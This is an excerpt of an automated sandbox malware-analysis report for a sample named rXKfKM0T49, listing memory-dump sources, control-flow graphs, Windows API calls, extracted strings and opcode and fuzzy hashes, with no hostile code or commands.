                                                                                                            • Instruction Fuzzy Hash: 4D91EF74D00208CFEB50DFA8D988B9CBBB1FF49311F208269E419BB291EB759985CF55
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623869181.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_150000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8809ea466948902fe450e429b6803cbfe3afb862dc82707cddf08c2244e68f3a
                                                                                                            • Instruction ID: 2249f24ffd8419b40380c393af59bbd150535f77d2ca5d6794d82316a84cb5ce
                                                                                                            • Opcode Fuzzy Hash: 8809ea466948902fe450e429b6803cbfe3afb862dc82707cddf08c2244e68f3a
                                                                                                            • Instruction Fuzzy Hash: 3291D874D00218CFDB14CFAAD984A9DBBF2BF89305F148169D819AB365DB345D45CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d93090e409951ba0e5bb73dc4684187d704d1c704ee6d99f7e22def54f524abc
                                                                                                            • Instruction ID: 20d4f44c43374daa70d597182cd5ee800cff77f7a560cff23f972c1738017ae9
                                                                                                            • Opcode Fuzzy Hash: d93090e409951ba0e5bb73dc4684187d704d1c704ee6d99f7e22def54f524abc
                                                                                                            • Instruction Fuzzy Hash: BB81E574E01248CFEB18DFA9D98069DBBF2BF88301F248529D454BB758DB35A942CF54
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ba0f6b4102a4e49eeec295e59edd221e90d33b782c7712d3a70b7d12e44a2a6c
                                                                                                            • Instruction ID: 591d0eeb399891c455552b96e1ba9aa7e45f848af0795a38ae68ad19a103e70f
                                                                                                            • Opcode Fuzzy Hash: ba0f6b4102a4e49eeec295e59edd221e90d33b782c7712d3a70b7d12e44a2a6c
                                                                                                            • Instruction Fuzzy Hash: C081D575D05268CFDB64CF6AC9847DDBBB2BF89301F1480EAE418AB250DB356A85CF40
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 909f6fa4ed6f030850a40fcd149ef7073695c1b7d4fb55d38b0a699515199147
                                                                                                            • Instruction ID: 87916066c73d5264ba863bbd3b32a29dbf6202bf0e46860523677e94f5594239
                                                                                                            • Opcode Fuzzy Hash: 909f6fa4ed6f030850a40fcd149ef7073695c1b7d4fb55d38b0a699515199147
                                                                                                            • Instruction Fuzzy Hash: 3D7192B4E01628CFEB68CF66C944B9DBBF2AF89300F14C0AAD40CA7255DB345A85CF11
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2f917a04752c27f69006ac1efb80afa9cfc1bc3b68e1f02c2e5967cf418f9028
                                                                                                            • Instruction ID: 2be4ffa176c3d48278d856c9ae65b7b29d4806848696af2a856d7e1d789d25b2
                                                                                                            • Opcode Fuzzy Hash: 2f917a04752c27f69006ac1efb80afa9cfc1bc3b68e1f02c2e5967cf418f9028
                                                                                                            • Instruction Fuzzy Hash: 747175B4D016288FEB68CF66C944B9DBBF2AF89301F14C1AAD50CB7255DB345A85CF11
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3e4fb5fba42832edcdd3fc4ec7f211f1b223456375055c7a5e726564ac6be881
                                                                                                            • Instruction ID: 6a94c884d3c62c73cd2c458a8a017d5198270d9ffb424261b011d85214efb286
                                                                                                            • Opcode Fuzzy Hash: 3e4fb5fba42832edcdd3fc4ec7f211f1b223456375055c7a5e726564ac6be881
                                                                                                            • Instruction Fuzzy Hash: E3611634A00359DFEB25DFA1C894BADB772FB88300F5084AA991AB7755CB365D92DF00
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 95c163bb7951df07443b0db1e4eadbc1d4c284983e7f1eb3a820f7dc16f605bb
                                                                                                            • Instruction ID: f2732d29e1b49980cdb709c23816a653380876f77fa74e45a15f6d6b8dd0d84e
                                                                                                            • Opcode Fuzzy Hash: 95c163bb7951df07443b0db1e4eadbc1d4c284983e7f1eb3a820f7dc16f605bb
                                                                                                            • Instruction Fuzzy Hash: 4941D2B5E01248CFEB18DFAAC99069DBBB2AF89300F24D169D418BB255EB385945CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1850394885a56cc6b649f877c143cddb22bf58e14645900e5c2c5d8c15a46612
                                                                                                            • Instruction ID: fe3f18ef9b83ef3321db1fa75e17df5a6447ec54a87054e690ecca9dacb2d5c4
                                                                                                            • Opcode Fuzzy Hash: 1850394885a56cc6b649f877c143cddb22bf58e14645900e5c2c5d8c15a46612
                                                                                                            • Instruction Fuzzy Hash: CB4158B1E016188BEB58CF6BC9457D9FAF3AFC9301F14C1AAC50CA6264DB740A858F51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3146570e80c8d1ebdc0c0c49b721b4b048391966ec73e3e3f7d5252990ed3776
                                                                                                            • Instruction ID: e157458906556d77cb2285d59cec017902606527d1a64acf3b804fd511f2b8a4
                                                                                                            • Opcode Fuzzy Hash: 3146570e80c8d1ebdc0c0c49b721b4b048391966ec73e3e3f7d5252990ed3776
                                                                                                            • Instruction Fuzzy Hash: 5F4138B5E016188BEB58CF6BCD457C9FAF3AFC9300F14C1AAD50CA6264DB740A858F51

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 38A109FE
                                                                                                            • GetCurrentThread.KERNEL32 ref: 38A10A3B
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 38A10A78
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 38A10AD1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2654135806.0000000038A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 38A10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_38a10000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Current$ProcessThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2063062207-0
                                                                                                            • Opcode ID: b4a22f5fa1be65403092ace52d8d0e642df548a2e8f0887ee8e63faa4e9c128b
                                                                                                            • Instruction ID: 133cecf25f7834cf2b3e2f3a1c306176936498409b7c39d6fe6753f25874db79
                                                                                                            • Opcode Fuzzy Hash: b4a22f5fa1be65403092ace52d8d0e642df548a2e8f0887ee8e63faa4e9c128b
                                                                                                            • Instruction Fuzzy Hash: F95156B0900749CFDB40CFAAC548BEEBFF1AF49300F24846AE458A7361DB749945CB65

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 38A109FE
                                                                                                            • GetCurrentThread.KERNEL32 ref: 38A10A3B
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 38A10A78
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 38A10AD1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2654135806.0000000038A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 38A10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_38a10000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Current$ProcessThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2063062207-0
                                                                                                            • Opcode ID: 73ac4bad39430993ee03187e0a5394bdf557af352b1e213fdbfc7298778176fc
                                                                                                            • Instruction ID: 042e5a6a3c1af2b1895b103210d6f3324a69a1dbc4c3a6b63942ba0bd2ee1df8
                                                                                                            • Opcode Fuzzy Hash: 73ac4bad39430993ee03187e0a5394bdf557af352b1e213fdbfc7298778176fc
                                                                                                            • Instruction Fuzzy Hash: 2F5134B0900609DFDB54CFAAC548BEEBBF1AF88300F208429E459A7351DB74A945CF65

                                                                                                            Control-flow Graph

                                                                                                            Control-flow graph (rendered graphically in the original; the executed/not-executed colour legend is not reproduced; block ids, address ranges, API call and edges as recovered): control_flow_graph 484 38a12018-38a1208a SetTimer 485 38a12093-38a120a7 484->485 486 38a1208c-38a12092 484->486 486->485
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2654135806.0000000038A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 38A10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_38a10000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Timer
                                                                                                            • String ID: W
                                                                                                            • API String ID: 2870079774-655174618
                                                                                                            • Opcode ID: 01e65f1e639386acc0af5e3ce237f57d4392ff12bcb0df496cd41b4f984938f8
                                                                                                            • Instruction ID: 1a3158dc6a679faef94fafbad4c05dd972505706246a4e8073d9825e4e49f483
                                                                                                            • Opcode Fuzzy Hash: 01e65f1e639386acc0af5e3ce237f57d4392ff12bcb0df496cd41b4f984938f8
                                                                                                            • Instruction Fuzzy Hash: C31133B5800348CFDB10CFAAD484BDEBFF4EB08320F14845AD898A7200C378A984CFA1

                                                                                                            Control-flow Graph

                                                                                                            Control-flow graph (rendered graphically in the original; the executed/not-executed colour legend is not reproduced; block ids, address ranges, calls and edges as recovered): control_flow_graph 1375 38a100b0-38a100b8 1376 38a100ba-38a100be 1375->1376 1377 38a100fd-38a10176 1375->1377 1378 38a100c0-38a100ed 1376->1378 1379 38a100f5-38a100f6 1376->1379 1380 38a10181-38a10188 1377->1380 1381 38a10178-38a1017e 1377->1381 1393 38a100f0 call 38a100b0 1378->1393 1394 38a100f0 call 38a10110 1378->1394 1395 38a100f0 call 38a10104 1378->1395 1382 38a10193-38a10232 CreateWindowExW 1380->1382 1383 38a1018a-38a10190 1380->1383 1381->1380 1385 38a10234-38a1023a 1382->1385 1386 38a1023b-38a10273 1382->1386 1383->1382 1385->1386 1390 38a10280 1386->1390 1391 38a10275-38a10278 1386->1391 1392 38a10281 1390->1392 1391->1390 1392->1392 1393->1379 1394->1379 1395->1379
                                                                                                            APIs
                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 38A10222
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2654135806.0000000038A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 38A10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_38a10000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 716092398-0
                                                                                                            • Opcode ID: b26b478461541c339e36b94699c36097d05a4aab285c4fa146b66f177d4891e4
                                                                                                            • Instruction ID: 129dea47a243adba05503c414417104cacc34eb07a79666f497365586b1d926e
                                                                                                            • Opcode Fuzzy Hash: b26b478461541c339e36b94699c36097d05a4aab285c4fa146b66f177d4891e4
                                                                                                            • Instruction Fuzzy Hash: 4851E2B5D04249EFDF02CFAAC884ACEBFB5BF49300F14816AE918AB221D7759855DF50

                                                                                                            Control-flow Graph

                                                                                                            Control-flow graph (rendered graphically in the original; the executed/not-executed colour legend is not reproduced; block ids, address ranges, API call and edges as recovered): control_flow_graph 1510 38a10104-38a10176 1512 38a10181-38a10188 1510->1512 1513 38a10178-38a1017e 1510->1513 1514 38a10193-38a10232 CreateWindowExW 1512->1514 1515 38a1018a-38a10190 1512->1515 1513->1512 1517 38a10234-38a1023a 1514->1517 1518 38a1023b-38a10273 1514->1518 1515->1514 1517->1518 1522 38a10280 1518->1522 1523 38a10275-38a10278 1518->1523 1524 38a10281 1522->1524 1523->1522 1524->1524
                                                                                                            APIs
                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 38A10222
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2654135806.0000000038A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 38A10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_38a10000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 716092398-0
                                                                                                            • Opcode ID: 9d46dbafde62df21e6de391540a91a2e1aef210d357fbf2e869922ca09a992f3
                                                                                                            • Instruction ID: 1ca87bf1759b9a2a45cc63fd0a893c5fc17f75913f9223265acfae718d37ceb4
                                                                                                            • Opcode Fuzzy Hash: 9d46dbafde62df21e6de391540a91a2e1aef210d357fbf2e869922ca09a992f3
                                                                                                            • Instruction Fuzzy Hash: 0A51D0B5D00348DFDB15CFAAC884ADEBBB5FF48310F64812AE818AB210D774A945CF90

Control-flow Graph
control_flow_graph 1525 38a10110-38a10176 1526 38a10181-38a10188 1525->1526 1527 38a10178-38a1017e 1525->1527 1528 38a10193-38a10232 CreateWindowExW 1526->1528 1529 38a1018a-38a10190 1526->1529 1527->1526 1531 38a10234-38a1023a 1528->1531 1532 38a1023b-38a10273 1528->1532 1529->1528 1531->1532 1536 38a10280 1532->1536 1537 38a10275-38a10278 1532->1537 1538 38a10281 1536->1538 1537->1536 1538->1538
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 38A10222
Memory Dump Source
• Source File: 00000003.00000002.2654135806.0000000038A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 38A10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_38a10000_rXKfKM0T49.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: 4d9ffee349bde28443a1ebe12a564d5df3695f81449aabb5d2b8b391e83ecd57
• Instruction ID: 13e0fa3bfcd894e0198dae032dd45d42bb1596cd641e053939d861dadd5fb104
• Opcode Fuzzy Hash: 4d9ffee349bde28443a1ebe12a564d5df3695f81449aabb5d2b8b391e83ecd57
• Instruction Fuzzy Hash: AC41AFB5D00349DFDB15CFAAD884ADEBBB5BF48310F64812AE818AB210D775A945CF90

Control-flow Graph
control_flow_graph 1539 38a11dc0-38a11dfc 1540 38a11e02-38a11e07 1539->1540 1541 38a11eac-38a11ecc 1539->1541 1542 38a11e09-38a11e40 1540->1542 1543 38a11e5a-38a11e92 CallWindowProcW 1540->1543 1548 38a11ecf-38a11edc 1541->1548 1551 38a11e42-38a11e48 1542->1551 1552 38a11e49-38a11e58 1542->1552 1544 38a11e94-38a11e9a 1543->1544 1545 38a11e9b-38a11eaa 1543->1545 1544->1545 1545->1548 1551->1552 1552->1548
APIs
• CallWindowProcW.USER32(?,?,?,?,?), ref: 38A11E81
Memory Dump Source
• Source File: 00000003.00000002.2654135806.0000000038A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 38A10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_38a10000_rXKfKM0T49.jbxd
Similarity
• API ID: CallProcWindow
• String ID:
• API String ID: 2714655100-0
• Opcode ID: 8a2d727f0a28561a3c3e967e408776a67a96bb8f36dba65ae91d2431fe21cd81
• Instruction ID: d1f11ef2630ba841874eedac9397f5df14d73e25cea4f2b502c98caedc6399af
• Opcode Fuzzy Hash: 8a2d727f0a28561a3c3e967e408776a67a96bb8f36dba65ae91d2431fe21cd81
• Instruction Fuzzy Hash: F64129B8900349CFDB04CF99C444BAABBF5FF88310F24C459D958AB361D774A841CBA0

Control-flow Graph
control_flow_graph 1653 38a1d488-38a1d48d 1654 38a1d431-38a1d432 1653->1654 1655 38a1d48f-38a1d4fe 1653->1655 1656 38a1d434-38a1d436 1654->1656 1657 38a1d438-38a1d43b 1654->1657 1659 38a1d500-38a1d506 1655->1659 1660 38a1d507-38a1d51b 1655->1660 1656->1657 1661 38a1d441-38a1d452 OleInitialize 1657->1661 1659->1660 1662 38a1d454-38a1d45a 1661->1662 1663 38a1d45b-38a1d478 1661->1663 1662->1663
APIs
• OleInitialize.OLE32(00000000), ref: 38A1D445
Memory Dump Source
• Source File: 00000003.00000002.2654135806.0000000038A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 38A10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_38a10000_rXKfKM0T49.jbxd
Similarity
• API ID: Initialize
• String ID:
• API String ID: 2538663250-0
• Opcode ID: 4c6bb6c6f3739f64881e72d637385518faa0bbaabc4d25c91f0b8275da97852f
• Instruction ID: 13ca7c9d030fc20bb662154b8e280e7e1929449eb8c749fb05d78f45e073f4c4
• Opcode Fuzzy Hash: 4c6bb6c6f3739f64881e72d637385518faa0bbaabc4d25c91f0b8275da97852f
• Instruction Fuzzy Hash: 8A3167B6C04248CFDB10CFAAD4447DEFBF0EF49220F24846AD899A7211C378A545CFA1

Control-flow Graph
control_flow_graph 1667 38a10bc0-38a10c5c DuplicateHandle 1669 38a10c65-38a10c82 1667->1669 1670 38a10c5e-38a10c64 1667->1670 1670->1669
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 38A10C4F
Memory Dump Source
• Source File: 00000003.00000002.2654135806.0000000038A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 38A10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_38a10000_rXKfKM0T49.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: 1a6c68335fb65e48c0e0d065e402c1775e450f36a24a601b502554f0228597d5
• Instruction ID: 245c7dba5656560966e64f3ba1184742ab73f34e063d5cff2346b68d71f9744d
• Opcode Fuzzy Hash: 1a6c68335fb65e48c0e0d065e402c1775e450f36a24a601b502554f0228597d5
• Instruction Fuzzy Hash: 1E21E5B5900249DFDB10CFAAD584BDEBBF4EF48320F14846AE954A7310D374A954CFA5

Control-flow Graph
control_flow_graph 1673 38a10bc8-38a10c5c DuplicateHandle 1674 38a10c65-38a10c82 1673->1674 1675 38a10c5e-38a10c64 1673->1675 1675->1674
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 38A10C4F
Memory Dump Source
• Source File: 00000003.00000002.2654135806.0000000038A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 38A10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_38a10000_rXKfKM0T49.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: ee640d5427fd63eda13a75df08e5179f3133cc05abfc4a7417e52c203b52b7df
• Instruction ID: 951687d136830438c75651dcd135f0898158ca534029b935fb0bdc28457ada95
• Opcode Fuzzy Hash: ee640d5427fd63eda13a75df08e5179f3133cc05abfc4a7417e52c203b52b7df
• Instruction Fuzzy Hash: 4521D5B5900249DFDB10CFAAD584BDEFBF4EB48310F14842AE958A7350D374A954CF65
APIs
• OleInitialize.OLE32(00000000), ref: 38A1D445
Memory Dump Source
• Source File: 00000003.00000002.2654135806.0000000038A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 38A10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_38a10000_rXKfKM0T49.jbxd
Similarity
• API ID: Initialize
• String ID:
• API String ID: 2538663250-0
• Opcode ID: 07f9501ffab70d702f74dda8e502d824a3cc1a5452bda3f6679127a63a06329d
• Instruction ID: 664698e3243152765af9f8901dd8555a6c451a601bb2122e0e6479f08ce5855a
• Opcode Fuzzy Hash: 07f9501ffab70d702f74dda8e502d824a3cc1a5452bda3f6679127a63a06329d
• Instruction Fuzzy Hash: AF1133B5804288CFDB10CFAAD484BDEBFF0EF49320F24846AD459A7200C375A544CFA1

Control-flow Graph
control_flow_graph 1690 38a1c560-38a1d452 OleInitialize 1692 38a1d454-38a1d45a 1690->1692 1693 38a1d45b-38a1d478 1690->1693 1692->1693
APIs
• OleInitialize.OLE32(00000000), ref: 38A1D445
Memory Dump Source
• Source File: 00000003.00000002.2654135806.0000000038A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 38A10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_38a10000_rXKfKM0T49.jbxd
Similarity
• API ID: Initialize
• String ID:
• API String ID: 2538663250-0
• Opcode ID: 129e69ec7c003b1508b11ebde02d2e28ba5e829548fc8e31cbe80e9b099aa93e
• Instruction ID: 81b0ea4a9550f1076ef71cc7ae8832df0bda5e7686047d6eeb227528d27eb5e9
• Opcode Fuzzy Hash: 129e69ec7c003b1508b11ebde02d2e28ba5e829548fc8e31cbe80e9b099aa93e
• Instruction Fuzzy Hash: E31142B1800748CFDB10CFAAC484BDEFBF4EB48320F20846AE958A7200D774A940CFA5
APIs
• DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,38A1D92F), ref: 38A1E72D
Memory Dump Source
• Source File: 00000003.00000002.2654135806.0000000038A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 38A10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_38a10000_rXKfKM0T49.jbxd
Similarity
• API ID: DispatchMessage
• String ID:
• API String ID: 2061451462-0
• Opcode ID: 0f64326dffe67da37c5018b797faa210622d27cd421e864f521fef871b3370cc
• Instruction ID: d693d6965bc0391be4d70e2085377a390e2f60206fc25887940610f3d6b06c2c
• Opcode Fuzzy Hash: 0f64326dffe67da37c5018b797faa210622d27cd421e864f521fef871b3370cc
• Instruction Fuzzy Hash: F311EDB5C04649DFDB10DF9AD444B9EBBF4AB48320F10846AE858A7610D378A544CFA5
APIs
• DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,38A1D92F), ref: 38A1E72D
Memory Dump Source
• Source File: 00000003.00000002.2654135806.0000000038A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 38A10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_38a10000_rXKfKM0T49.jbxd
Similarity
• API ID: DispatchMessage
• String ID:
• API String ID: 2061451462-0
• Opcode ID: a849a62430c750a15f80e9e19c2caccf311a0883f7ffc289a4eaf7a3c950906a
• Instruction ID: dc244b257306528161cea2ee748acdcd986e02c5fd34d4b011e06e57ada74316
• Opcode Fuzzy Hash: a849a62430c750a15f80e9e19c2caccf311a0883f7ffc289a4eaf7a3c950906a
• Instruction Fuzzy Hash: 9811F2B5C04649CFDB10DFAAE444BDEBBF4EF48320F14842AD898A7650D778A544CFA5
APIs
Memory Dump Source
• Source File: 00000003.00000002.2654135806.0000000038A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 38A10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_38a10000_rXKfKM0T49.jbxd
Similarity
• API ID: Timer
• String ID:
• API String ID: 2870079774-0
• Opcode ID: 0d9a78d92bce451da3e2d32e6c64381f74562787e6ce4a09601d4758a78ef9e0
• Instruction ID: dcb5764bee35d94c16ecd63f54c5b54726d1b76c303fb4b96ba1ded4889fac57
• Opcode Fuzzy Hash: 0d9a78d92bce451da3e2d32e6c64381f74562787e6ce4a09601d4758a78ef9e0
• Instruction Fuzzy Hash: FB11F7B5800749DFDB10DF9AD445BDEFBF8EB48720F10841AE958A7210C375A984CFA5
Strings
Memory Dump Source
• Source File: 00000003.00000002.2623869181.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_150000_rXKfKM0T49.jbxd
Similarity
• API ID:
• String ID: \'v5
• API String ID: 0-2991269168
• Opcode ID: 1bd4502206227a8a3d55f1bdb21ebdd1c2f2ae022be46dc862fcb1c36a1a7997
• Instruction ID: 5eb8408bd5f8212d3fd1d5de2effc5f1727d90e44176ff2aa2bf5e89027e7f44
• Opcode Fuzzy Hash: 1bd4502206227a8a3d55f1bdb21ebdd1c2f2ae022be46dc862fcb1c36a1a7997
• Instruction Fuzzy Hash: CBA11374A00349CFDB44DFB4D894A9DBBB2FB49301B509229E515FB262EB34AD46CF84
Strings
Memory Dump Source
• Source File: 00000003.00000002.2623869181.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_150000_rXKfKM0T49.jbxd
Similarity
• API ID:
• String ID: \'v5
• API String ID: 0-2991269168
• Opcode ID: 93ef79f0f16b8b33c2da1703f3a99134608ed50176192857f21496dabf9f449f
• Instruction ID: af922ee95f12f4118c84e4ce6f95531d087e02706b566210ccec95a70b74e21e
• Opcode Fuzzy Hash: 93ef79f0f16b8b33c2da1703f3a99134608ed50176192857f21496dabf9f449f
• Instruction Fuzzy Hash: C3A1C274A00309CFDB44DFB4D994A9DBBB2FB48301B509229E515FB261EB34A986CF84
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623869181.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_150000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: T
                                                                                                            • API String ID: 0-3187964512
                                                                                                            • Opcode ID: 40e309c5fd7d8355a25a7153bbdce9e628b6715f7291acd600e829016c427669
                                                                                                            • Instruction ID: d9706dc7b5d16df845d644a7ce816abf573a2a322c7d7e802203593214f4b638
                                                                                                            • Opcode Fuzzy Hash: 40e309c5fd7d8355a25a7153bbdce9e628b6715f7291acd600e829016c427669
                                                                                                            • Instruction Fuzzy Hash: 93318F30701244CFEB00DF58C984BAABBE6EB88305F148465ED25EF251EB70DD458BA5
                                                                                                            Strings
                                                                                                            • 8Ky5DKy5PKy5\Ky5hKy5Ky5, xrefs: 00154640
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623869181.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_150000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 8Ky5DKy5PKy5\Ky5hKy5Ky5
                                                                                                            • API String ID: 0-3200053145
                                                                                                            • Opcode ID: 458ff2e96c7cd7fa13a20c48b91e00d95d510042d67a8e6181cd14cc74e452d7
                                                                                                            • Instruction ID: 07b0a7d3997db7daa01d0409d9387c0e45c3433e8f99acbe0e7dc5f32dafc31c
                                                                                                            • Opcode Fuzzy Hash: 458ff2e96c7cd7fa13a20c48b91e00d95d510042d67a8e6181cd14cc74e452d7
